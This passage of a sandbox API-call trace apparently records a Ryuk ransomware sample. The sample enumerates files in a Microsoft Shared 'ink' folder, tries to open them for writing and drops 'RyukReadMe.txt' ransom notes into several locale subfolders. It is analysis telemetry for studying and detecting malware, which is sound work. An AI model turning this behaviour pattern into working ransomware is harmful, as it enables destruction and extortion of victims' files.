"c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.322] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.322] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.322] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", dwFileAttributes=0x80) returned 0 [0161.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.322] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.323] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.323] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", dwFileAttributes=0x80) returned 0 [0161.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.323] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.323] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.323] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.323] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", dwFileAttributes=0x80) returned 0 [0161.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.324] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.324] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.324] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", dwFileAttributes=0x80) returned 0 [0161.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.324] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.324] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", dwFileAttributes=0x80) returned 0 [0161.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.325] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.325] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", dwFileAttributes=0x80) returned 0 [0161.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.328] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.328] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.328] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", dwFileAttributes=0x80) returned 0 [0161.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.329] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.329] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.329] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.329] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", dwFileAttributes=0x80) returned 0 [0161.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.330] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.330] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", dwFileAttributes=0x80) returned 0 [0161.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.330] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.330] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.330] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", dwFileAttributes=0x80) returned 0 [0161.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.331] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.331] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.331] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", dwFileAttributes=0x80) returned 0 [0161.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.331] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.331] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.332] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.332] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", dwFileAttributes=0x80) returned 0 [0161.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.332] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.332] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.332] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.332] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", dwFileAttributes=0x80) returned 0 [0161.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.333] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.333] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.333] SetLastError (dwErrCode=0x0) [0161.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.333] GetLastError () returned 0x5 [0161.333] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.333] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.333] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.333] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.334] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.334] SetLastError (dwErrCode=0x0) [0161.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.334] GetLastError () returned 0x5 [0161.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.334] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.334] SetLastError (dwErrCode=0x0) [0161.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.334] GetLastError () returned 0x5 [0161.334] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.335] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.335] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.335] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.335] SetLastError (dwErrCode=0x0) [0161.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.335] GetLastError () returned 0x5 [0161.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.335] SetLastError (dwErrCode=0x0) [0161.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.335] GetLastError () returned 0x5 [0161.335] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.335] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.336] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.336] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.336] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.336] SetLastError (dwErrCode=0x0) [0161.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.336] GetLastError () returned 0x5 [0161.336] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.336] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.336] SetLastError (dwErrCode=0x0) [0161.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.336] GetLastError () returned 0x5 [0161.336] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.336] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.336] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.337] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.337] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.337] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.337] SetLastError (dwErrCode=0x0) [0161.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.337] GetLastError () returned 0x5 [0161.337] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.337] SetLastError (dwErrCode=0x0) [0161.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.337] GetLastError () returned 0x5 [0161.337] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.337] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.338] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.338] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.338] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.338] SetLastError (dwErrCode=0x0) [0161.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.338] GetLastError () returned 0x5 [0161.338] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.338] SetLastError (dwErrCode=0x0) [0161.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.338] GetLastError () returned 0x5 [0161.338] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.338] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.338] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.339] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.339] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.339] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.339] SetLastError (dwErrCode=0x0) [0161.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.339] GetLastError () returned 0x5 [0161.339] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.339] SetLastError (dwErrCode=0x0) [0161.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.339] GetLastError () returned 0x5 [0161.339] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.339] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.339] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.340] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.340] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.340] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.340] SetLastError (dwErrCode=0x0) [0161.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.340] GetLastError () returned 0x5 [0161.340] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.340] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.340] SetLastError (dwErrCode=0x0) [0161.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 